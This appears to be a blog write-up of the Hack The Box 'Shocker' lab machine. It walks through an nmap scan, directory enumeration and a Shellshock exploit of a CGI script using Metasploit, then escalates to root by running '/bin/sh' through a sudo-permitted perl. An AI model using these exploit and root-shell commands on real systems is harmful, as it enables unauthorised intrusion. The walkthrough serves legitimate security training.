Hackthebox Shocker Writeup

Hackthebox Shocker Writeup
Hackthebox Shocker Writeup
Hackthebox Shocker Writeup


It is a easy machine from hack the box which has more of enumeration and then finding the right exploit and privilege escalation was very easy .

Steps involved

1-Port Scan
2-Directory Enumeration
3-Checking the request
4-Exploitaion through metasploit
5-Privilage escalation

Commands involved

1-nmap -sC -sV -O -v -oV
3-dirb -X .sh
4-curl -vvv
5-use exploit/multi/http/apache_mod_cgi_bash_env_exec
6-msf exploit(apache_mod_cgi_bash_env_exec) >set rhost
7-msf exploit(apache_mod_cgi_bash_env_exec) >set lhost
8-msf exploit(apache_mod_cgi_bash_env_exec) >set targeturi /cgi-bin/user.sh
9-msf exploit(apache_mod_cgi_bash_env_exec) >run
10-sudo perl -e 'exec "/bin/sh"'

Port Scan

Nmap 7.70 scan initiated Tue Apr 21 07:52:11 2020 as: nmap -sC -sV -O -v -oV
Increasing send delay for from 0 to 5 due to 231 out of 769 dropped probes since last increase.
Nmap scan report for
Host is up (0.28s latency).
Not shown: 998 closed ports
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA) | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA) | 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Uptime guess: 202.073 days (since Wed Oct 2 06:08:48 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Tue Apr 21 07:53:21 2020 -- 1 IP address (1 host up) scanned in 71.12 seconds

So let’s visit the website.

Hackthebox Shocker Writeup

Nothing in the source code

<!DOCTYPE html> <html> <body> <h2>Don't Bug Me!</h2> <img src="bug.jpg" alt="bug" style="width:450px;height:350px;"> </body> </html>  

Directory enumeration

Hackthebox Shocker Writeup

Found /cgi-bin.

But 404 on it .Let’s run dirb again

root@nagendra:~/Desktop/htb/shocker# dirb -X .sh

DIRB v2.22
By The Dark Raver
START_TIME: Tue Apr 21 08:41:43 2020
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.sh) | (.sh) [NUM = 1]

---- Scanning URL: ----

And found user .sh

When curled it i found this –

root@nagendra:~/Desktop/htb/shocker# curl
Content-Type: text/plain
Just an uptime test script
08:11:17 up 16 min, 0 users, load average: 0.00, 0.00, 0.00

Checking the request

SO let’s see what the request does.

curl -vvv
Hackthebox Shocker Writeup

Taking some hint from the name of machine.

Exploitaion through metasploit

I found a metasploit exploit against it.

Using metasploit

Hackthebox Shocker Writeup

Got the user flag and the shell.

Hackthebox Shocker Writeup

Privilege escalation

Privilege escalation is easy.

Just sudo -l that’s all.

meterpreter > shell
Process 1538 created.
Channel 2 created.
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
sudo perl 'exec "/bin/sh"'
Can't open perl script "exec "/bin/sh"": No such file or directory
sudo perl -e 'exec "/bin/sh"'
cat /root/root.txt

How useful was this post?

Click on a star to rate it!

Average rating 1 / 5. Vote count: 1

No votes so far! Be the first to rate this post.

As you found this post useful...

Follow us on social media!

We are sorry that this post was not useful for you!

Let us improve this post!

Tell us how we can improve this post?


No comments yet. Why don’t you start the discussion?

Leave a Reply

Your email address will not be published. Required fields are marked *